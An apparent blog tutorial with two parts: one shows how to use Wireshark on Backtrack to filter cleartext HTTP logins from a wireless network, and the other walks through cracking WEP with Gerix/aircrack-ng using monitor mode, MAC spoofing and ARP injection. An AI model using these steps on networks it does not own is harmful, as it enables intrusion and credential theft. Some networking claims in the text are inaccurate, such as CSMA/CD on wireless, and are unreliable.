Sniffing to see who done it.. on the network

So, is it a big deal if someone hops on your wireless network? Yes, kind of. It is more of a security risk for someone to be on your wireless network than to plug into a port on your switch. One of the reason is because the wireless access point, like hubs, acts as a single collision domain. Each computer connected to the wireless will be broadcasting all transmissions to one another and using CSMA/CD to control the traffic. Switches are smart enough to only broadcast traffic associated with the MAC so you will have a as many collision domains as you do ports.

With all that being said, those connected to your wireless network can see all the information you send and receive (unless layer 2 isolation is configured on the AP).

Since we installed Backtrack last time we will use it again. It comes pre-loaded with Wireshark so open it up

Configure the wireless networking interface you plan on using to capture the packets and click start.

It should start recording all the information, which is a lot of data so we will need to filter out only the information we need, log in and passwords. Click Expression and scroll down to find what you need. This example I will use HTTP filtering and type in the value "username" to find any information where a username is transferred over clear text

If you want to gather information on a website you can type in the URL, if you know the IP of the workstation you can filter out by IP as well

Once I applied my filter results came up with a HTTP form log in for web mail access that did not use SSL. Expanding the results below displayed the username and password used on the webpage.

If the page was encrypted the user name would have probably been hashed.

Cracking WEP wireless network

     Online encryption is important but most people I’ve come across never give a second thought about it. They don’t think that a hacker will hack them because they are just ordinary people. But we regular folks are the ones they are after! They use minions to achieve their wicked goals because they are disposable. This post will be a 3 part series that demonstrates how to infiltrate a wireless network with WEP encryption, sniff the network traffic, and then use the data collected to impersonate a user. The goal is to raise awareness on how vulnerable wireless connections are.

     There are hundreds of articles online that will teach you how to crack a wireless network. Now there is another one.

1) Download Backtrack ISO and burn it to CD and then boot from the disc.
       You don’t need to install the program but you can
       I will be using the BT5R3-GNOME-32 for this demonstration
2) Once it is installed or booted up, login and start the GUI
       Default user name is root and the password is toor
       Type startx to start the GUI
3) The tool we will use is Gerix
       Navigate to: Applications, BackTrack, Exploitations Tools, WLAN Exploitation, gerix-wifi-cracker-ng

4) Click the configuration tab and highlight your wireless adapter (wlan0) listed under interface
       If there is no adapter present, refer to the notes at the end of this article
5) Click enable/disable monitor mode to create a new interface (mon0)
       Highlight mon0 and set a random mac address

6) Scroll down and click rescan networks
       After the wireless network appears, select one from the list with WEP encryption and decent signal strength

7) Navigate to the WEP tab and start sniffing
       A box will appear, just move it aside, don’t close it
          The number below #Data is what we are monitoring
          The more traffic on the network the more we get, but we can inject stuff to make traffic

If no one is on the network then you will need to simulate traffic, click test injection to see if the AP is vulnerable.

8) Try a Chopchop attack first, Crate an ARP packet to be injected the Inject the create ARP packet
       Another window will pop up and ask you if want to inject with the created packet, type Y and hit enter
       This will help you get more #Data (try fragmentation injection if it doesn’t work)

9) Once you have at least 5000, try and crack
       Click on the Cracking tab and click on Decrypt WEP password

     Another Window will pop up and will display the password when successful

If you don’t have enough #Data it will not be successful, wait to get more and click Decrypt WEP again when you have more (10,000 or 15,000)


     Gerix is just a GUI for the aircrack-ng, for full functionality, your wireless adapter chipset will need to support injection. The list of supported chipsets can be found here the page has not been modified since 2011, so there are probably more chipsets on the market that is supported.